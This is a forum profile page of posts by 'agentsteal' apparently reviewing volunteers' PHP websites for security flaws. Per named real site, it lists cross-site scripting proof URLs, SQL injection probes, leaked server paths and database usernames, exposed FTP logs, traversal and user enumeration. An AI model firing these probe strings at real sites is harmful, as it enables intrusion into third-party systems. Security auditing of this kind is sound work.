agentsteal
-
Posts
230 -
Joined
-
Last visited
Never
Posts posted by agentsteal
-
-
Cross Site Scripting:
There is Cross Site Scripting if the message contains </textarea>code.
-
Cross Site Scripting:
http://www.bjjnews.org/TUF/pagetest.php?page=1<marquee><h1>vulnerable</marquee>
Cross Site Scripting:
http://www.bjjnews.org/TUF/index.php?page=1<marquee><h1>vulnerable</marquee>
Full Path Disclosure:
http://www.bjjnews.org/TUF/library/closedb.php
Warning: mysql_close(): supplied argument is not a valid MySQL-Link resource in /home/bjjnews/public_html/TUF/library/closedb.php on line 5Full Path Disclosure:
http://www.bjjnews.org/TUF/library/opendb.php
Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'bjjnews'@'localhost' (using password: NO) in /home/bjjnews/public_html/TUF/library/opendb.php on line 3I cannot connect to the database because: Access denied for user 'bjjnews'@'localhost' (using password: NO)
Full Path Disclosure:
http://www.bjjnews.org/TUF/admin/index.php
Warning: main(/home/bjjnews/public_html/bitrix/modules/main/interface/index.php) [function.main]: failed to open stream: No such file or directory in /home/bjjnews/public_html/TUF/admin/index.php on line 2Warning: main(/home/bjjnews/public_html/bitrix/modules/main/interface/index.php) [function.main]: failed to open stream: No such file or directory in /home/bjjnews/public_html/TUF/admin/index.php on line 2
Fatal error: main() [function.require]: Failed opening required '/home/bjjnews/public_html/bitrix/modules/main/interface/index.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/bjjnews/public_html/TUF/admin/index.php on line 2
Full Path Disclosure:
http://www.bjjnews.org/TUF/index.php?page[]
Fatal error: Unsupported operand types in /home/bjjnews/public_html/TUF/pagetest.php on line 96Full Path Disclosure:
http://www.bjjnews.org/TUF/pagetest.php?page[]
Fatal error: Unsupported operand types in /home/bjjnews/public_html/TUF/pagetest.php on line 96Log:
http://www.bjjnews.org/TUF/images/WS_FTP.LOG
Log:
http://www.bjjnews.org/TUF/images/thumbs/WS_FTP.LOG
User Enumeration:
http://www.bjjnews.org/~bjjnews
User Enumeration:
http://www.bjjnews.org/~nobody
User Enumeration:
-
CAPTCHA:
The solution for the CAPTCHA is on the page.
SQL Error:
http://76.98.141.11/game/index.php?act=profile&id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\\\\\'' at line 1SQL Injection:
http://76.98.141.11/game/index.php?act=profile&id=16 AND 1=1
http://76.98.141.11/game/index.php?act=profile&id=16 AND 1=2
-
Cross Site Scripting:
http://www.rent-that-home.com/basicsearch.php/"><marquee><h1>vulnerable</marquee>
Cross Site Scripting:
http://www.rent-that-home.com/search.php/"><marquee><h1>vulnerable</marquee>
Cross Site Scripting:
There is Cross Site Scripting on http://www.rent-that-home.com/forgot.php if the username contains code.
Drop Down Menu:
If you edit the drop down menus on http://www.rent-that-home.com/ you can submit arbitrary values.
Drop Down Menu:
If you edit the drop down menus on http://www.rent-that-home.com/advanced.php you can submit arbitrary values.
Drop Down Menu:
If you edit the drop down menus on http://www.rent-that-home.com/basic.php you can submit arbitrary values.
Full Path Disclosure:
http://www.rent-that-home.com/search.php?p='
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/rentwil0/public_html/search.php on line 272Unknown column 're_listings.Price' in 'order clause'
Full Path Disclosure:
http://www.rent-that-home.com/test.php
Warning: imagecreatefrompng(lipsum.png) [function.imagecreatefrompng]: failed to open stream: No such file or directory in /home/rentwil0/public_html/test.php on line 38Warning: imagecolorallocate(): supplied argument is not a valid Image resource in /home/rentwil0/public_html/test.php on line 41
Warning: getimagesize(lipsum.png) [function.getimagesize]: failed to open stream: No such file or directory in /home/rentwil0/public_html/test.php on line 47
Warning: imagestring(): supplied argument is not a valid Image resource in /home/rentwil0/public_html/test.php on line 58
Warning: imagepng(): supplied argument is not a valid Image resource in /home/rentwil0/public_html/test.php on line 61
Warning: imagedestroy(): supplied argument is not a valid Image resource in /home/rentwil0/public_html/test.php on line 64
Full Path Disclosure:
http://www.rent-that-home.com/includes.php
Warning: mysql_query() [function.mysql-query]: Access denied for user 'rentwil0'@'localhost' (using password: NO) in /home/rentwil0/public_html/includes.php on line 5Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/rentwil0/public_html/includes.php on line 5
Access denied for user 'rentwil0'@'localhost' (using password: NO)
SQL Error:
http://www.rent-that-home.com/search.php?page
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-10, 10' at line 1User Enumeration:
http://www.rent-that-home.com/~rentwil0
User Enumeration:
http://www.rent-that-home.com/~root
User Enumeration:
-
Array:
http://www.versatilebb.com/demo/index.php?target=viewforum&select[]
Cross Site Scripting:
http://www.versatilebb.com/demo/index.php/"><marquee><h1>vulnerable</marquee>
Cross Site Scripting:
There is Cross Site Scripting if a post contains ">code.
Cross Site Scripting:
There is Cross Site Scripting in the profile if the fields contain ">code.
Full Path Disclosure:
http://www.versatilebb.com/demo/index.php?target[]
Fatal error: Call to undefined function: htmlspecialchars_decode() in /home/versatil/public_html/demo/forum.php on line 252Full Path Disclosure:
http://www.versatilebb.com/demo/dereferrer.php?url[]
Warning: urldecode() expects parameter 1 to be string, array given in /home/versatil/public_html/demo/dereferrer.php on line 19URL Inclusion:
http://www.versatilebb.com/demo/dereferrer.php?url=google.com
User Enumeration:
http://www.versatilebb.com/~root
User Enumeration:
-
Cross Site Scripting:
http://www.shopwisely.org/save.php?totalRows_newdeals=1<marquee><h1>vulnerable</marquee>
Cross Site Scripting:
http://www.shopwisely.org/save.php?"><marquee><h1>vulnerable</marquee>
Full Path Disclosure:
http://www.shopwisely.org/save.php?pageNum_newdeals[]
Fatal error: Unsupported operand types in /home/awemptyn/public_html/donate/save.php on line 45Full Path Disclosure:
http://www.shopwisely.org/~awemptyn
Warning: require(/home/awemptyn/public_html/donate/boards/SSI.php) [function.require]: failed to open stream: No such file or directory in /home/awemptyn/public_html/includes/header.inc on line 1Fatal error: require() [function.require]: Failed opening required '/home/awemptyn/public_html/donate/boards/SSI.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/awemptyn/public_html/includes/header.inc on line 1
Full Path Disclosure:
http://www.shopwisely.org/save.php?totalRows_newdeals[]
Fatal error: Unsupported operand types in /home/awemptyn/public_html/donate/save.php on line 75SQL Error:
http://www.shopwisely.org/save.php?pageNum_newdeals=-1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-11, 11' at line 1User Enumeration:
http://www.shopwisely.org/~awemptyn
User Enumeration:
-
Array:
http://www.independentmillwall.com/prediction/userinfo.php?user[]
Includes Directory:
http://www.independentmillwall.com/prediction/include/
Insecure Cookie:
You shouldn't put the username in the cookie.
User Enumeration:
http://www.independentmillwall.com/~nobody
User Enumeration:
-
Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/Copy_of_calendar_variables.php
Fatal error: Call to undefined function: gsqlwhere() in /home/validgr/public_html/worldcalendar/include/Copy_of_calendar_variables.php on line 20Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/calendar_variables.php
Fatal error: Call to undefined function: gsqlwhere() in /home/validgr/public_html/worldcalendar/include/calendar_variables.php on line 20Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/category_masterlist.php
Warning: main(include/category_settings.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/category_masterlist.php on line 2Warning: main(include/category_settings.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/category_masterlist.php on line 2
Warning: main(include/category_settings.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/category_masterlist.php on line 2
Warning: main() [function.include]: Failed opening 'include/category_settings.php' for inclusion (include_path='.:/usr/lib/php') in /home/validgr/public_html/worldcalendar/include/category_masterlist.php on line 2
Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/category_masterprint.php
Warning: main(include/category_settings.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/category_masterprint.php on line 2Warning: main(include/category_settings.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/category_masterprint.php on line 2
Warning: main(include/category_settings.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/category_masterprint.php on line 2
Warning: main() [function.include]: Failed opening 'include/category_settings.php' for inclusion (include_path='.:/usr/lib/php') in /home/validgr/public_html/worldcalendar/include/category_masterprint.php on line 2
Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/category_variables.php
Fatal error: Call to undefined function: gsqlwhere() in /home/validgr/public_html/worldcalendar/include/category_variables.php on line 20Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/customer_masterlist.php
Warning: main(include/customer_settings.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/customer_masterlist.php on line 2Warning: main(include/customer_settings.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/customer_masterlist.php on line 2
Warning: main(include/customer_settings.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/customer_masterlist.php on line 2
Warning: main() [function.include]: Failed opening 'include/customer_settings.php' for inclusion (include_path='.:/usr/lib/php') in /home/validgr/public_html/worldcalendar/include/customer_masterlist.php on line 2
Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/customer_masterprint.php
Warning: main(include/customer_settings.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/customer_masterprint.php on line 2Warning: main(include/customer_settings.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/customer_masterprint.php on line 2
Warning: main(include/customer_settings.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/customer_masterprint.php on line 2
Warning: main() [function.include]: Failed opening 'include/customer_settings.php' for inclusion (include_path='.:/usr/lib/php') in /home/validgr/public_html/worldcalendar/include/customer_masterprint.php on line 2
Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/customer_statistics_variables.php
Fatal error: Call to undefined function: gsqlwhere() in /home/validgr/public_html/worldcalendar/include/customer_statistics_variables.php on line 20Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/customer_variables.php
Fatal error: Call to undefined function: gsqlwhere() in /home/validgr/public_html/worldcalendar/include/customer_variables.php on line 20Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/daily_variables.php
Fatal error: Call to undefined function: gsqlwhere() in /home/validgr/public_html/worldcalendar/include/daily_variables.php on line 20Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/dbcommon.php
Warning: main(include/locale.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/dbcommon.php on line 24Warning: main(include/locale.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/dbcommon.php on line 24
Warning: main(include/locale.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/dbcommon.php on line 24
Warning: main() [function.include]: Failed opening 'include/locale.php' for inclusion (include_path='.:/usr/lib/php') in /home/validgr/public_html/worldcalendar/include/dbcommon.php on line 24
Warning: main(include/events.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/dbcommon.php on line 25
Warning: main(include/events.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/dbcommon.php on line 25
Warning: main(include/events.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/dbcommon.php on line 25
Warning: main() [function.include]: Failed opening 'include/events.php' for inclusion (include_path='.:/usr/lib/php') in /home/validgr/public_html/worldcalendar/include/dbcommon.php on line 25
Warning: main(include/commonfunctions.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/dbcommon.php on line 26
Warning: main(include/commonfunctions.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/dbcommon.php on line 26
Warning: main(include/commonfunctions.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/dbcommon.php on line 26
Warning: main() [function.include]: Failed opening 'include/commonfunctions.php' for inclusion (include_path='.:/usr/lib/php') in /home/validgr/public_html/worldcalendar/include/dbcommon.php on line 26
Warning: main(include/dbconnection.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/dbcommon.php on line 27
Warning: main(include/dbconnection.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/dbcommon.php on line 27
Warning: main(include/dbconnection.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/dbcommon.php on line 27
Warning: main() [function.include]: Failed opening 'include/dbconnection.php' for inclusion (include_path='.:/usr/lib/php') in /home/validgr/public_html/worldcalendar/include/dbcommon.php on line 27
Warning: set_error_handler() expects argument 1, 'error_handler', to be a valid callback in /home/validgr/public_html/worldcalendar/include/dbcommon.php on line 133
Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/edit_calendar_variables.php
Fatal error: Call to undefined function: gsqlwhere() in /home/validgr/public_html/worldcalendar/include/edit_calendar_variables.php on line 20Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/functions.php
Warning: main(include/dbcommon.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/functions.php on line 2Warning: main(include/dbcommon.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/functions.php on line 2
Warning: main(include/dbcommon.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/functions.php on line 2
Warning: main() [function.include]: Failed opening 'include/dbcommon.php' for inclusion (include_path='.:/usr/lib/php') in /home/validgr/public_html/worldcalendar/include/functions.php on line 2
Warning: main(include/##@TABLE.strShortTableName##_events.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/functions.php on line 3
Warning: main(include/##@TABLE.strShortTableName##_events.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/functions.php on line 3
Warning: main(include/##@TABLE.strShortTableName##_events.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/functions.php on line 3
Warning: main() [function.include]: Failed opening 'include/##@TABLE.strShortTableName##_events.php' for inclusion (include_path='.:/usr/lib/php') in /home/validgr/public_html/worldcalendar/include/functions.php on line 3
Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/globals_variables.php
Fatal error: Call to undefined function: gsqlwhere() in /home/validgr/public_html/worldcalendar/include/globals_variables.php on line 20Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/howto_variables.php
Fatal error: Call to undefined function: gsqlwhere() in /home/validgr/public_html/worldcalendar/include/howto_variables.php on line 20Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/monthly_variables.php
Fatal error: Call to undefined function: gsqlwhere() in /home/validgr/public_html/worldcalendar/include/monthly_variables.php on line 20Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/task_statistics_variables.php
Fatal error: Call to undefined function: gsqlwhere() in /home/validgr/public_html/worldcalendar/include/task_statistics_variables.php on line 20Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/users_variables.php
Fatal error: Call to undefined function: gsqlwhere() in /home/validgr/public_html/worldcalendar/include/users_variables.php on line 20Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/weekly_variables.php
Fatal error: Call to undefined function: gsqlwhere() in /home/validgr/public_html/worldcalendar/include/weekly_variables.php on line 20Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/yearly_variables.php
Fatal error: Call to undefined function: gsqlwhere() in /home/validgr/public_html/worldcalendar/include/yearly_variables.php on line 20Full Path Disclosure:
http://www.valid.gr/worldcalendar/include/%c1%ed%f4%df%e3%f1%e1%f6%ef%20%e1%f0%fc%20dbcommon.php
Warning: main(include/locale.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/Áíôßãñáöï áðü dbcommon.php on line 24Warning: main(include/locale.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/Áíôßãñáöï áðü dbcommon.php on line 24
Warning: main(include/locale.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/Áíôßãñáöï áðü dbcommon.php on line 24
Warning: main() [function.include]: Failed opening 'include/locale.php' for inclusion (include_path='.:/usr/lib/php') in /home/validgr/public_html/worldcalendar/include/Áíôßãñáöï áðü dbcommon.php on line 24
Warning: main(include/events.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/Áíôßãñáöï áðü dbcommon.php on line 25
Warning: main(include/events.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/Áíôßãñáöï áðü dbcommon.php on line 25
Warning: main(include/events.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/Áíôßãñáöï áðü dbcommon.php on line 25
Warning: main() [function.include]: Failed opening 'include/events.php' for inclusion (include_path='.:/usr/lib/php') in /home/validgr/public_html/worldcalendar/include/Áíôßãñáöï áðü dbcommon.php on line 25
Warning: main(include/commonfunctions.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/Áíôßãñáöï áðü dbcommon.php on line 26
Warning: main(include/commonfunctions.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/Áíôßãñáöï áðü dbcommon.php on line 26
Warning: main(include/commonfunctions.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/Áíôßãñáöï áðü dbcommon.php on line 26
Warning: main() [function.include]: Failed opening 'include/commonfunctions.php' for inclusion (include_path='.:/usr/lib/php') in /home/validgr/public_html/worldcalendar/include/Áíôßãñáöï áðü dbcommon.php on line 26
Warning: main(include/dbconnection.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/Áíôßãñáöï áðü dbcommon.php on line 27
Warning: main(include/dbconnection.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/Áíôßãñáöï áðü dbcommon.php on line 27
Warning: main(include/dbconnection.php) [function.main]: failed to open stream: No such file or directory in /home/validgr/public_html/worldcalendar/include/Áíôßãñáöï áðü dbcommon.php on line 27
Warning: main() [function.include]: Failed opening 'include/dbconnection.php' for inclusion (include_path='.:/usr/lib/php') in /home/validgr/public_html/worldcalendar/include/Áíôßãñáöï áðü dbcommon.php on line 27
Warning: set_error_handler() expects argument 1, 'error_handler', to be a valid callback in /home/validgr/public_html/worldcalendar/include/Áíôßãñáöï áðü dbcommon.php on line 133
Includes Directory:
http://www.valid.gr/worldcalendar/include/
Insecure Cookie:
You shouldn't put the password in the cookie.
Insecure Cookie:
You shouldn't put the username in the cookie.
SQL Error:
http://www.valid.gr/worldcalendar/include/errors.xml
User Enumeration:
User Enumeration:
-
Cross Site Scripting:
There is Cross Site Scripting when you log in if your username contains '>code.
Cross Site Scripting:
There is Cross Site Scripting when you register if your username contains '>code.
Cross Site Scripting:
There is Cross Site Scripting if the Expect header contains code.
-
Array:
http://www.XXXXXXXX/faq.php?r[]
Array:
http://www.XXXXXXXX/register.php?r[]
Array:
http://www.XXXXXXXX/index.php?r[]
Array:
http://www.XXXXXXXX/profile.php?r[]
Array:
http://www.XXXXXXXX/credits.php?r[]
Array:
http://www.XXXXXXXX/login.php?r[]
Array:
http://www.XXXXXXXX/tos.php?r[]
Array:
http://www.XXXXXXXX/history.php?r[]
Array:
http://www.XXXXXXXX/advertise.php?r[]
Array:
http://www.XXXXXXXX/logout.php?r[]
Array:
http://www.XXXXXXXX/about.php?r[]
Array:
http://www.XXXXXXXX/contact.php?r[]
Array:
http://www.XXXXXXXX/surf.php?r[]
Array:
http://www.XXXXXXXX/privacy.php?r[]
Array:
http://www.XXXXXXXX/recoverpwd.php?r[]
Array:
http://www.XXXXXXXX/members.php?r[]
Array:
http://www.XXXXXXXX/messenger.php?r[]
Array:
http://www.XXXXXXXX/referals.php?r[]
Array:
http://www.XXXXXXXX/convert.php?r[]
Array:
http://www.XXXXXXXX/upgrade.php?r[]
Array:
http://www.XXXXXXXX/contest.php?r[]
Array:
http://www.XXXXXXXX/news.php?r[]
Array:
http://www.XXXXXXXX/banners.php?r[]
Cross Site Scripting:
http://www.XXXXXXXX/convert.php?convert=cash&poname=paypal<marquee><h1>vulnerable</marquee>
Cross Site Scripting:
There is Cross Site Scripting when you register if the fields contain code.
Cross Site Scripting:
There is Cross Site Scripting when you log in if the fields contain code.
DOS:
http://www.XXXXXXXX/logout.php/
DOS:
http://www.XXXXXXXX/chkudtsess.php/
DOS:
http://www.XXXXXXXX/chkudtsess_du.php/
DOS:
http://www.XXXXXXXX/members.php/
DOS:
http://www.XXXXXXXX/profile.php/
DOS:
http://www.XXXXXXXX/history.php/
DOS:
http://www.XXXXXXXX/messenger.php/
DOS:
http://www.XXXXXXXX/referals.php/
DOS:
http://www.XXXXXXXX/convert.php/
DOS:
http://www.XXXXXXXX/upgrade.php/
DOS:
http://www.XXXXXXXX/contest.php/
DOS:
DOS:
http://www.XXXXXXXX/banners.php/
DOS:
http://www.XXXXXXXX/advertise.php/
DOS:
http://www.XXXXXXXX/credits.php/
Full Path Disclosure:
http://www.XXXXXXXX/viewp.php?ad=\
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/buddypon/public_html/viewp.php on line 17Full Path Disclosure:
There is Full Path Disclosure on http://www.XXXXXXXX/upgrade.php if you submit the form.
Fatal error: Cannot redeclare ucayunjd() (previously declared in /home/buddypon/public_html/chkudtsess.php:3) in /home/buddypon/public_html/chkudtsess_du.php on line 3Insecure Cookie:
You shouldn't put the username in the cookie.
User Enumeration:
User Enumeration:
-
Cross Site Scripting:
http://www.movetophp.com/test.php?<marquee><h1>vulnerable</marquee>
Full Path Disclosure:
-
Cross Site Scripting:
The image upload is vulnerable to Cross Site Scripting.
User Enumeration:
http://pics.windsorfamilyfarm.com/~nobody
User Enumeration:
-
Admin Access:
Anyone can get your username and password with the PHP Source Code Disclosure.
Directory Transversal:
There is Directory Transversal if the url field contains ../
Full Path Disclosure:
http://scripts.loado.com/pagegrabber/contentgrabber.php
Warning: strpos() [function.strpos]: Offset not contained in string. in /home/ld1/public_html/scripts/pagegrabber/contentgrabber.php on line 35Warning: strpos() [function.strpos]: Offset not contained in string. in /home/ld1/public_html/scripts/pagegrabber/contentgrabber.php on line 36
Full Path Disclosure:
There is Full Path Disclosure if the url field contains an invalid value.
Warning: fopen(a) [function.fopen]: failed to open stream: No such file or directory in /home/ld1/public_html/scripts/pagegrabber/contentgrabber.php on line 9Warning: file_get_contents(a) [function.file-get-contents]: failed to open stream: No such file or directory in /home/ld1/public_html/scripts/pagegrabber/contentgrabber.php on line 10
Warning: strpos() [function.strpos]: Offset not contained in string. in /home/ld1/public_html/scripts/pagegrabber/contentgrabber.php on line 35
Warning: strpos() [function.strpos]: Offset not contained in string. in /home/ld1/public_html/scripts/pagegrabber/contentgrabber.php on line 36
PHP Source Code Disclosure:
There is PHP Source Code Disclosure if the url field contains ../file.php.
User Enumeration:
http://scripts.loado.com/~admin
User Enumeration:
User Enumeration:
http://scripts.loado.com/~nobody
User Enumeration:
-
Array:
http://www.iupgbsa.info/profile.php?user[]
Cross Site Scripting:
http://www.iupgbsa.info/forgotpassword.php/"><marquee><h1>vulnerable</marquee>
Cross Site Scripting:
http://www.iupgbsa.info/index.php/"><marquee><h1>vulnerable</marquee>
Cross Site Scripting:
http://www.iupgbsa.info/profile.php?user="><marquee><h1>vulnerable</marquee>
User Enumeration:
http://www.iupgbsa.info/~admin
User Enumeration:
http://www.iupgbsa.info/~iupgbsa
User Enumeration:
-
Full Path Disclosure:
http://clients.futuresolutions.com/fsi/content/page/
Warning: Smarty error: unable to read resource: "/services/www/clients.futuresolutions.com/fsi/Modules/page/template/.tpl" in /services/www/clients.futuresolutions.com/fsi/Includes/Smarty/Smarty.class.php on line 1095Full Path Disclosure:
http://clients.futuresolutions.com/fsi/content/page/news/
Notice: Undefined offset: 2 in /services/www/clients.futuresolutions.com/fsi/Modules/page/page.php on line 164Notice: Undefined offset: 2 in /services/www/clients.futuresolutions.com/fsi/Modules/page/page.php on line 164
Notice: Undefined offset: 2 in /services/www/clients.futuresolutions.com/fsi/Modules/page/page.php on line 169
Notice: Undefined index: news_image in /services/www/clients.futuresolutions.com/fsi/Modules/page/page.php on line 189
Notice: Undefined index: news_image in /services/www/clients.futuresolutions.com/fsi/Modules/page/page.php on line 189
Notice: Undefined index: news_image in /services/www/clients.futuresolutions.com/fsi/Modules/page/page.php on line 189
Notice: Undefined index: news_image in /services/www/clients.futuresolutions.com/fsi/Modules/page/page.php on line 189
Notice: Undefined index: news_image in /services/www/clients.futuresolutions.com/fsi/Modules/page/page.php on line 189
Full Path Disclosure:
http://clients.futuresolutions.com/fsi/content/page/news/view/
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /services/www/clients.futuresolutions.com/fsi/Modules/page/page.php on line 207Full Path Disclosure:
http://clients.futuresolutions.com/fsi/login/
Notice: Undefined offset: 1 in /services/www/clients.futuresolutions.com/fsi/Modules/user/user.php on line 25Notice: Undefined offset: 1 in /services/www/clients.futuresolutions.com/fsi/Modules/user/user.php on line 35
Full Path Disclosure:
There is Full Path Disclosure if you try to log in.
Notice: Undefined index: password2 in /services/www/clients.futuresolutions.com/fsi/Modules/user/user.php on line 50 -
Array:
http://www.allaboutexotics.co.uk/userinfo.php?user[]
Full Path Disclosure:
http://www.allaboutexotics.co.uk/admin/admin.php
Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'your_name'@'srv86.one.com' (using password: YES) in /customers/allaboutexotics.co.uk/allaboutexotics.co.uk/httpd.www/include/database.php on line 24Access denied for user 'your_name'@'srv86.one.com' (using password: YES)
Full Path Disclosure:
http://www.allaboutexotics.co.uk/include/database.php
Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'your_name'@'srv86.one.com' (using password: YES) in /customers/allaboutexotics.co.uk/allaboutexotics.co.uk/httpd.www/include/database.php on line 24Access denied for user 'your_name'@'srv86.one.com' (using password: YES)
Full Path Disclosure:
http://www.allaboutexotics.co.uk/include/session.php
Warning: mysql_connect() [function.mysql-connect]: Access denied for user 'your_name'@'srv86.one.com' (using password: YES) in /customers/allaboutexotics.co.uk/allaboutexotics.co.uk/httpd.www/include/database.php on line 24Access denied for user 'your_name'@'srv86.one.com' (using password: YES)
PHP Source Code Disclosure:
http://www.allaboutexotics.co.uk/index.php?p=main
User Enumeration:
http://www.allaboutexotics.co.uk/~nobody
User Enumeration:
-
Array:
http://vampirecity.cx-music.com/covensimwith.php?u[]
Array:
http://vampirecity.cx-music.com/friendswith.php?u[]
Array:
http://vampirecity.cx-music.com/friendsof.php?u[]
Array:
http://vampirecity.cx-music.com/contest.php?contest[]
Cross Site Scripting:
There is Cross Site Scripting if the Expect header contains code.
Full Path Disclosure:
http://vampirecity.cx-music.com/includes/footer.php
Warning: main(googlebottom.php) [function.main]: failed to open stream: No such file or directory in /home/www/vampirecity.cx-music.com/includes/footer.php on line 6Full Path Disclosure:
http://vampirecity.cx-music.com/forum/includes/footer.php
Warning: main(googlebottom.php) [function.main]: failed to open stream: No such file or directory in /home/www/vampirecity.cx-music.com/forum/includes/footer.php on line 3Warning: main() [function.include]: Failed opening 'googlebottom.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/www/vampirecity.cx-music.com/forum/includes/footer.php on line 3
Full Path Disclosure:
http://vampirecity.cx-music.com/includes/commentsadd.php
Warning: main() [function.include]: Failed opening 'config.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/www/vampirecity.cx-music.com/includes/commentsadd.php on line 2Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) in /home/www/vampirecity.cx-music.com/includes/commentsadd.php on line 4
Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: A link to the server could not be established in /home/www/vampirecity.cx-music.com/includes/commentsadd.php on line 4
Warning: mysql_query() [function.mysql-query]: Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) in /home/www/vampirecity.cx-music.com/includes/commentsadd.php on line 6
Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/www/vampirecity.cx-music.com/includes/commentsadd.php on line 6
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/www/vampirecity.cx-music.com/includes/commentsadd.php on line 8
Warning: mysql_close(): no MySQL-Link resource supplied in /home/www/vampirecity.cx-music.com/includes/commentsadd.php on line 10
Warning: main(includes/footer.php) [function.main]: failed to open stream: No such file or directory in /home/www/vampirecity.cx-music.com/includes/commentsadd.php on line 136
Warning: main() [function.include]: Failed opening 'includes/footer.php' for inclusion (include_path='.:/usr/local/lib/php') in /home/www/vampirecity.cx-music.com/includes/commentsadd.php on line 136
Full Path Disclosure:
http://vampirecity.cx-music.com/includes/usersonline.php
Parse error: parse error, unexpected T_VARIABLE in /home/www/vampirecity.cx-music.com/includes/usersonline.php on line 7Full Path Disclosure:
There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value.
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/www/vampirecity.cx-music.com/includes/header2.php on line 10Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/www/vampirecity.cx-music.com/includes/header2.php:10) in /home/www/vampirecity.cx-music.com/includes/header2.php on line 10
Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/www/vampirecity.cx-music.com/includes/header2.php:10) in /home/www/vampirecity.cx-music.com/includes/header2.php on line 10
